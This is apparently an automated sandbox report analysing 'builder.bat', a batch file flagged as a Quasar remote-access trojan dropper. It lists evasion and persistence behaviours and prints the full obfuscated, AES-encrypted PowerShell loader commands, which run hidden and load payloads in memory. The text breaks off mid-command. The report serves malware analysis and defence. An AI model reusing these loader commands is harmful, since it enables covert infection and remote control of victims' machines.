Overview

overview

10

Static

static

1

builder.bat

windows7-x64

7

builder.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-06-2024 15:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    builder.bat

  • Size

    14.9MB

  • MD5

    70a53c5ec35eefae927a0c413a89937a

  • SHA1

    1bc9a22903968bfc05b87c1082a5c4242802d4dd

  • SHA256

    a7aa6fa77e4931544a6966ef435400c52a79af300a548aca4e9c67f72218ac2d

  • SHA512

    c712f2b98b0eb8c4808e4abcee0cc6100fc3e7d445f40208da0429b754148f190083ce247f183bb112083c15b06f466cbe573fe01f47de3d7958d8624e8d9aae

  • SSDEEP

    49152:QYwuS617ST7nN2d57VTqUTm0AmK0jEHD5FQ/9gsyuEgPXiGncZwPnzLO1WtJHFi7:S

Score
10/10
quasarspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops file in System32 directory 22 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{07bcca39-dd2c-4f2b-aba9-62cfd44491e4}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b8c99258-9957-4c5c-9e96-febbe81690a8}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1352
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8b7f0c5d-9503-478e-8dec-7f20c4c96695}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:916
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4ed94203-899e-4e01-af12-c974317f1c96}
          2⤵
            PID:2228
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{3dcd5921-48af-48e7-b8c0-74bad0801f5a}
            2⤵
              PID:3920
          • C:\Windows\system32\lsass.exe
            C:\Windows\system32\lsass.exe
            1⤵
              PID:684
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
              1⤵
                PID:960
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:736
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:1048
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1124
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1132
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2816
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1140
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1152
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1284
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1292
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1304
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1384
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1472
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2596
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1576
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1588
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1640
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1712
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1756
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1764
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1856
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1112
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1496
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:2064
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:2096
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2240
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2288
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2392
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2560
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2568
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2608
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2780
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2844
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2856
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2864
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2876
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2940
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:928
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3316
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3404
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\builder.bat"
                                                                                        2⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2636
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:2544
                                                                                          • C:\Windows\system32\net.exe
                                                                                            net session
                                                                                            3⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2184
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 session
                                                                                              4⤵
                                                                                                PID:3604
                                                                                            • C:\Users\Admin\AppData\Local\Temp\builder.bat.exe
                                                                                              "builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VsYFF($UqIEP){ $cckBt=[System.Security.Cryptography.Aes]::Create(); $cckBt.Mode=[System.Security.Cryptography.CipherMode]::CBC; $cckBt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $cckBt.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UEGY9MIPrGN+l8HMK+EOWWOHd3i8s5ddQy0gjFJszf0='); $cckBt.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIU6Lrw5kmXrlY9ZdCP5WQ=='); $twFeA=$cckBt.CreateDecryptor(); $return_var=$twFeA.TransformFinalBlock($UqIEP, 0, $UqIEP.Length); $twFeA.Dispose(); $cckBt.Dispose(); $return_var;}function onOdy($UqIEP){ $DcweI=New-Object System.IO.MemoryStream(,$UqIEP); $sUfkw=New-Object System.IO.MemoryStream; $rNOwy=New-Object System.IO.Compression.GZipStream($DcweI, [IO.Compression.CompressionMode]::Decompress); $rNOwy.CopyTo($sUfkw); $rNOwy.Dispose(); $DcweI.Dispose(); $sUfkw.Dispose(); $sUfkw.ToArray();}function spGXl($UqIEP,$ZvarV){ $UbgZg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UqIEP); $oUCsb=$UbgZg.EntryPoint; $oUCsb.Invoke($null, $ZvarV);}$WAkYi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\builder.bat').Split([Environment]::NewLine);foreach ($kjXpr in $WAkYi) { if ($kjXpr.StartsWith(':: ')) { $vbeRz=$kjXpr.Substring(4); break; }}$IzdcO=[string[]]$vbeRz.Split('\');$clAux=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[0])));$WNxAq=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[1])));spGXl $WNxAq (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));spGXl $clAux (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                              3⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Checks computer location settings
                                                                                              • Deletes itself
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Drops file in Windows directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4432
                                                                                              • C:\Windows\$sxr-powershell.exe
                                                                                                "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); $ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))
                                                                                                4⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3388
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3388).WaitForExit();[System.Threading.Thread]::Sleep(5000); function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); $ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 